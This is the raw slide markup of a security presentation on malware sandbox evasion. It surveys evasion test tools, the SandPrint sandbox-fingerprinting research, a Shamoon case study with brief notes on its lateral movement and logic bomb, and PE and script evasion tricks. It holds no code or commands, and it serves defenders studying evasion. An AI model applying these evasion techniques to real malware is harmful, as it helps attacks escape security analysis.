            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Multiple attack vector (e.g. WMI, COM, Script, System utility) are leveraged in wild</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Security vendors have been empowering their weapons in evasion arm race</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  Runtime memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>snapshot and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>signature scan for further forensics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Kernel exploit detection by full emulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Bridge dynamic and static analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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315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169"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="31169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Thank You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104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2"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="4502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3568" y="1923678"/>
            <a:ext cx="7848872" cy="1512168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="8000" b="1" dirty="0" smtClean="0"/>
              <a:t>Evasion Test Framework</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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121856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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Evasion Test Framework Collection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 altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Al-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>khaser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Public malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sandbox detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Pafish</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Pafish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> is a demonstration tool that employs several techniques to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>detect sandboxes and analysis environments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>in the same way as malware families do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Pafishmacro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Pafish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Macro is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Macro enabled Office Document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> to detect malware analysis systems and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>sandboxes by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>evasion &amp; detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>techniques.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Sems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Virtualbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>VirtualMachine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, Cuckoo, Anubis, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ThreatExpert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Sandboxie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, QEMU, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis Tools Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>CheckPointSW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>InviZzzible</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>InviZzzible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is a tool for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>assessment of your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>virtual environments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>most recent and up to date detection and evasion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>techniques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>as well </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as fixes for them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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460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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Generic Sandbox evasion algorithm</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	from a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>cademic–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>SandPrint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 1/2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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 altLang="zh-TW" dirty="0" err="1"/>
              <a:t>SandPrint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: Fingerprinting Malware Sandboxes to Provide Intelligence for Sandbox Evasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Yokohama National University </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>yokoyama-akira-bs|ishii-kou-yf|tanabe-rui-nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>}@ynu.jp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>introduce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SandPrint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, a program that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>measures and leaks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>charac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>teristics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of Windows-targeted sandboxes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. We submit our tool to 20 mal-ware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>analysis services and collect 2666 analysis reports that cluster </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>to76 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>sandboxes. We then systemically assess whether an attacker can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>possibly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>find a subset of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>characteristics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that are inherent to all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sandboxes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>not just characteristic of a single sandbox. In fact, using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>supervised learning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>techniques, we show that adversaries can automatically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>generate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a classifier that can reliably tell a sandbox and a real system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>apart. Finally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, we show that we can use similar techniques to stealthily </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>detect commercial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>malware security appliances of three popular vendors.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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320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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Generic Sandbox evasion algorithm</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>cademic–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>SandPrint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> 1/2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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56" y="987574"/>
            <a:ext cx="8596105" cy="2629128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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402336" y="3616702"/>
            <a:ext cx="8366760" cy="1115288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Client side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-Feature collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-Feature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Selection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Classification with algorithm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2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022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1923678"/>
            <a:ext cx="8208912" cy="1512168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="8000" b="1" dirty="0" smtClean="0"/>
              <a:t>Evasion Trend Summary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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377095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03648" y="1923678"/>
            <a:ext cx="6329904" cy="1512168"/>
          </a:xfrm>
        </p:spPr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altLang="zh-CN" sz="8000" b="1" smtClean="0"/>
              <a:t>Backup Slides</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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254734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TW" dirty="0" smtClean="0"/>
              <a:t>Evasion Trend Summary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Noteworthy Evasion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Case Study</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Evasion Test Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Evasion Benchmark Design</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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194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Evasion Overview</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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288" y="603097"/>
            <a:ext cx="9269288" cy="454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12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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Shamoon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> APT Evasion in 2016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2336" y="699542"/>
            <a:ext cx="8366760" cy="3816424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One of most destructive APT in 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Behavior in Brief:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>NetUseAdd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> with hardcoded (weak)user/pass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>OpenSCManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and execute payload in remote target machine in LAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Evasion Tricks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1. Check parameter number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2. Logic bomb of Hardcoded date time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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW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876" y="2637483"/>
            <a:ext cx="6174564" cy="250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7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131"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="86131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Evasion Overview – PE evasion 1/4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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13" y="607375"/>
            <a:ext cx="9207663" cy="453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2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Evasion Overview – PE evasion 2/4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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126" y="607375"/>
            <a:ext cx="9192126" cy="453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9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945" y="-72619"/>
            <a:ext cx="7270110" cy="528873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Evasion Overview – PE evasion 3/4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9327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Evasion Overview – PE evasion 4/4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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-20538"/>
            <a:ext cx="55861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62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03648" y="1923678"/>
            <a:ext cx="6329904" cy="1512168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altLang="zh-CN" sz="8000" b="1" dirty="0" smtClean="0"/>
              <a:t>Script Evasion</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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342612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Script Evasion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 smtClean="0"/>
              <a:t>Multiple Script Type</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>1. Office Macro, JavaScript, VBScript, WMI script in RCE such as email or website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>2. Unusual file types -.PIF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>.SCR .JS .HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> .PUB .CHM……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Evasion tricks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
